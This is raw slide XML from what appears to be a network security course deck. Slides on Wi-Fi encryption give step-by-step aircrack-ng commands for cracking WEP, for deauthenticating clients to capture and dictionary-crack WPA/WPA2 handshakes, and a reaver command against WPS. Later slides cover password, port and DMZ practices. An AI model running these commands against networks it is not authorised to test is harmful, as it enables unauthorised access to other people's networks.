        <p:spPr>
          <a:xfrm>
            <a:off x="951800" y="1851750"/>
            <a:ext cx="73236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accent1"/>
              </a:buClr>
              <a:buSzPts val="1440"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>There are several types of encryption or security modes</a:t>
            </a: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386" name="Google Shape;386;p41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677300" y="26133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WEP</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="387" name="Google Shape;387;p41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="951800" y="3147150"/>
            <a:ext cx="36156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Is not safe. It is attacked by extracting enough packages.</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388" name="Google Shape;388;p41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4903350" y="2443825"/>
            <a:ext cx="69033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 iwconfig</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>~$ airmon-ng start wlp4s0</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>That create a monitor i.e. mon0</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sometimes change MAC is needed:</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>~$ ifconfig interface(mon0) down</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>~$ macchanger -m 00:11:22:33:44:55 interface</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>~$ ifconfig interface up</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>~$ airodump-ng interface</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>When network target is shown press CTRL+C</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Then capture packets:</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>~$ airodump-ng -c channel -w file --bssid MAC:port interface</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Open new terminal without closing the previous:</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>~$ aireplay-ng -1 6000 -a BSSIDmac -h myMAC interface</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>But is too slow. This is more fast:</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>~$ aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b BSSIDmac -h myMAC interface</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If there are at least one packet in a new terminal without closing the previous type:</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>~$ aircrack-ng -z nameNetwork*.cap</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Probably we will get the key.</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2"/>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25</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="395" name="Google Shape;395;p42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677300" y="117957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WPA and WPA2</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="396" name="Google Shape;396;p42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="817625" y="1778125"/>
            <a:ext cx="36156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Have an exploit if there is a WPS in the network</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="3F3F3F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>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Only is possible attack PSK authentication</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="3F3F3F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>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Are more secure than WEP</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397" name="Google Shape;397;p42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5288700" y="1236075"/>
            <a:ext cx="69033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t>~$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ca-ES">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>airmon-ng stop ath0</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>~$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ca-ES"/>
              <a:t>iwconfig</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>~$ airmon-ng start wlp4s0 9</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Check monitor mode</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>~$ iwconfig</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>~$ airodump-ng interfacemonitor</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>~$ airodump-ng -c 1 --bssid macBSSID -w file interfacemonitor</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>~$ airodump-ng interfacemonitor</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Select client that STATION is equal to BSSID</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>~$ aireplay-ng -0 1 -a macBSSID -c macClient interfacemonitor</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Get a dictionary gunzip /user/share/worldlists/rockyou.txt.gz</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and remove duplicates with sort diccionari | uniq -u &gt; dictionariU</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>~$ aircrack-ng -w dictionariU -b macBSSID file*.cap</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>~$ airodump-ng -c 1 --bssid macBSSID -w file interface</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Probably we will get the key.</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398" name="Google Shape;398;p42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1303625" y="33377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ES">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>~$ reaver -b ESSID -i interface -vv</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3"/>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a:t>Good Practices</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="405" name="Google Shape;405;p43"/>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26</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="406" name="Google Shape;406;p4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192625" y="4179125"/>
            <a:ext cx="2891950" cy="2164300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="407" name="Google Shape;407;p4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958650" y="1026275"/>
            <a:ext cx="4463700" cy="3152850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="408" name="Google Shape;408;p43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647000" y="1851750"/>
            <a:ext cx="50328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Unique password for each site </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="3F3F3F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>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&gt;= than 8 characters</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="3F3F3F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>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Numbers</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="3F3F3F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>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Some capital letter</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="3F3F3F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>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Symbols !@#*&amp;%</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="3F3F3F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>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 pwgen</a:t>
            </a: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409" name="Google Shape;409;p43"/>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Password</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="410" name="Google Shape;410;p43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="799400" y="4747350"/>
            <a:ext cx="50328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80 and 443 </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="3F3F3F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>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110 Pop and 143 IMAP</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="3F3F3F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>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25 SMTP</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="3F3F3F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pP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411" name="Google Shape;411;p43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="829700" y="42135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Open only some Ports</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1">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4"/>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27</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="418" name="Google Shape;418;p44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647000" y="1851750"/>
            <a:ext cx="41040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Layers and devices or sophisticated rules</a:t>
            </a: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419" name="Google Shape;419;p44"/>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DMZ</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="420" name="Google Shape;420;p4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448200" y="1762625"/>
            <a:ext cx="3527450" cy="1752401"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="421" name="Google Shape;421;p4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378736" y="555775"/>
            <a:ext cx="3666378" cy="913650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="422" name="Google Shape;422;p4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978750" y="4407300"/>
            <a:ext cx="3624100" cy="2299909"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="423" name="Google Shape;423;p4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928900" y="3893325"/>
            <a:ext cx="5460700" cy="1171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5"/>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28</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="430" name="Google Shape;430;p45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647000" y="1851750"/>
            <a:ext cx="41040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Is more safety use Statics IPs to prevent intrusions not allowed. </a:t>
            </a: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431" name="Google Shape;431;p45"/>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DHCP</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="432" name="Google Shape;432;p45"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1268350" y="2838325"/>
            <a:ext cx="8048625" cy="2952750"/>
          </a:xfrm>
